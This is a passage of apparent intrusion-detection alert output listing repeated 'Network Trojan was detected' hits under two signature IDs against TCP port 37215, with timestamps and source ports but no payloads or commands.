              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062518
              SID:2829579
              Source Port:51246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516469
              SID:2835222
              Source Port:45664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505234
              SID:2829579
              Source Port:49416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101762
              SID:2829579
              Source Port:58988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364408
              SID:2835222
              Source Port:40258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530946
              SID:2835222
              Source Port:48402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235489
              SID:2835222
              Source Port:53016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250626
              SID:2829579
              Source Port:41104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724503
              SID:2835222
              Source Port:39268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368741
              SID:2829579
              Source Port:45088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493219
              SID:2835222
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538026
              SID:2829579
              Source Port:35740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637727
              SID:2829579
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695080
              SID:2835222
              Source Port:59784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247634
              SID:2829579
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965602
              SID:2835222
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972613
              SID:2829579
              Source Port:53454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988436
              SID:2835222
              Source Port:56326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474727
              SID:2835222
              Source Port:57984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802515
              SID:2829579
              Source Port:43158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368831
              SID:2829579
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856974
              SID:2835222
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252815
              SID:2835222
              Source Port:59408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724198
              SID:2829579
              Source Port:34842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308723
              SID:2835222
              Source Port:47870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431613
              SID:2829579
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446429
              SID:2829579
              Source Port:44246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186012
              SID:2835222
              Source Port:58932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395112
              SID:2829579
              Source Port:53554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278139
              SID:2829579
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049728
              SID:2835222
              Source Port:55338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119001
              SID:2835222
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154337
              SID:2829579
              Source Port:43162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538053
              SID:2829579
              Source Port:59788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882760
              SID:2835222
              Source Port:41176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118489
              SID:2835222
              Source Port:35472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477277
              SID:2835222
              Source Port:38098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967139
              SID:2829579
              Source Port:35290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204691
              SID:2829579
              Source Port:36880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827985
              SID:2835222
              Source Port:54550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187109
              SID:2835222
              Source Port:44424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483177
              SID:2835222
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598204
              SID:2829579
              Source Port:53504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493194
              SID:2829579
              Source Port:41170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487002
              SID:2829579
              Source Port:32814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163404
              SID:2835222
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634797
              SID:2835222
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797631
              SID:2829579
              Source Port:40566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546982
              SID:2829579
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831521
              SID:2829579
              Source Port:51578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835080
              SID:2835222
              Source Port:34436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494763
              SID:2829579
              Source Port:51558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445040
              SID:2835222
              Source Port:37024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623317
              SID:2835222
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574490
              SID:2835222
              Source Port:50688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433207
              SID:2835222
              Source Port:57644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574722
              SID:2835222
              Source Port:38740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302940
              SID:2829579
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575189
              SID:2829579
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363265
              SID:2835222
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459531
              SID:2835222
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506521
              SID:2829579
              Source Port:43024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517944
              SID:2829579
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583961
              SID:2829579
              Source Port:55444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635645
              SID:2835222
              Source Port:49166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860121
              SID:2829579
              Source Port:35682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198727
              SID:2829579
              Source Port:34190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340875
              SID:2835222
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150947
              SID:2835222
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928774
              SID:2835222
              Source Port:44136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361033
              SID:2835222
              Source Port:43332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970900
              SID:2829579
              Source Port:43190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689741
              SID:2835222
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432443
              SID:2835222
              Source Port:52014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068955
              SID:2829579
              Source Port:44826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269166
              SID:2835222
              Source Port:42974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207720
              SID:2835222
              Source Port:47672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545705
              SID:2829579
              Source Port:59648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573442
              SID:2835222
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591864
              SID:2829579
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536432
              SID:2835222
              Source Port:39788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375132
              SID:2829579
              Source Port:42394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506745
              SID:2835222
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334197
              SID:2829579
              Source Port:47134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537852
              SID:2829579
              Source Port:38462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574830
              SID:2829579
              Source Port:33542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231627
              SID:2835222
              Source Port:32792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057615
              SID:2835222
              Source Port:46218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456729
              SID:2829579
              Source Port:42362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664464
              SID:2829579
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163521
              SID:2829579
              Source Port:56246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374110
              SID:2835222
              Source Port:60072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752658
              SID:2829579
              Source Port:59906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346990
              SID:2829579
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519653
              SID:2835222
              Source Port:55774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547168
              SID:2835222
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920825
              SID:2829579
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480141
              SID:2829579
              Source Port:51514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459820
              SID:2829579
              Source Port:57228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538149
              SID:2835222
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368981
              SID:2829579
              Source Port:39134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635796
              SID:2835222
              Source Port:34052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982266
              SID:2835222
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725534
              SID:2835222
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489592
              SID:2829579
              Source Port:49448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2829579
              Source Port:44690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108908
              SID:2835222
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103194
              SID:2829579
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680416
              SID:2835222
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600569
              SID:2835222
              Source Port:36660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663311
              SID:2835222
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111004
              SID:2835222
              Source Port:56260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624502
              SID:2835222
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202899
              SID:2829579
              Source Port:35492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345278
              SID:2835222
              Source Port:53592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445517
              SID:2829579
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433664
              SID:2835222
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926736
              SID:2829579
              Source Port:33270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485500
              SID:2829579
              Source Port:45378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430471
              SID:2829579
              Source Port:54676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102265
              SID:2829579
              Source Port:46484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725737
              SID:2829579
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749182
              SID:2829579
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199909
              SID:2829579
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537241
              SID:2829579
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265785
              SID:2829579
              Source Port:59922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341195
              SID:2835222
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100658
              SID:2829579
              Source Port:33940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287929
              SID:2835222
              Source Port:44330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396346
              SID:2829579
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455313
              SID:2829579
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128696
              SID:2835222
              Source Port:57416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585474
              SID:2829579
              Source Port:59086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635908
              SID:2829579
              Source Port:59056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.573957
              SID:2829579
              Source Port:39052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428240
              SID:2835222
              Source Port:47034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638239
              SID:2829579
              Source Port:51158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623352
              SID:2829579
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098907
              SID:2829579
              Source Port:41820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725293
              SID:2835222
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421671
              SID:2829579
              Source Port:56616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483147
              SID:2835222
              Source Port:58300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507287
              SID:2835222
              Source Port:44942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763929
              SID:2835222
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763323
              SID:2835222
              Source Port:40740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281631
              SID:2835222
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364401
              SID:2829579
              Source Port:48598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457809
              SID:2829579
              Source Port:34372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123632
              SID:2829579
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575342
              SID:2835222
              Source Port:40274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045224
              SID:2835222
              Source Port:53144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118167
              SID:2835222
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2835222
              Source Port:49226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113501
              SID:2835222
              Source Port:52428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447184
              SID:2835222
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923367
              SID:2835222
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187992
              SID:2835222
              Source Port:42064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493577
              SID:2835222
              Source Port:39312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197377
              SID:2835222
              Source Port:58218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456751
              SID:2829579
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574099
              SID:2835222
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640611
              SID:2829579
              Source Port:53762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802256
              SID:2829579
              Source Port:49170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926459
              SID:2835222
              Source Port:38552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100502
              SID:2829579
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201005
              SID:2829579
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062247
              SID:2829579
              Source Port:44534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459612
              SID:2835222
              Source Port:59734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286824
              SID:2835222
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076844
              SID:2829579
              Source Port:60372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633056
              SID:2829579
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814707
              SID:2829579
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595493
              SID:2829579
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246078
              SID:2835222
              Source Port:35084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872301
              SID:2829579
              Source Port:38084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572017
              SID:2835222
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300230
              SID:2835222
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347596
              SID:2829579
              Source Port:33182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125475
              SID:2835222
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478245
              SID:2835222
              Source Port:54952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128699
              SID:2835222
              Source Port:35370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828512
              SID:2835222
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433427
              SID:2829579
              Source Port:39146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253659
              SID:2829579
              Source Port:41540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504775
              SID:2835222
              Source Port:39090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987251
              SID:2829579
              Source Port:56814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443568
              SID:2829579
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724489
              SID:2829579
              Source Port:42096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121250
              SID:2835222
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504583
              SID:2829579
              Source Port:50076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2835222
              Source Port:46014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100006
              SID:2829579
              Source Port:33556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168042
              SID:2835222
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377668
              SID:2829579
              Source Port:60920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601444
              SID:2835222
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080567
              SID:2835222
              Source Port:33618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123130
              SID:2829579
              Source Port:60588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
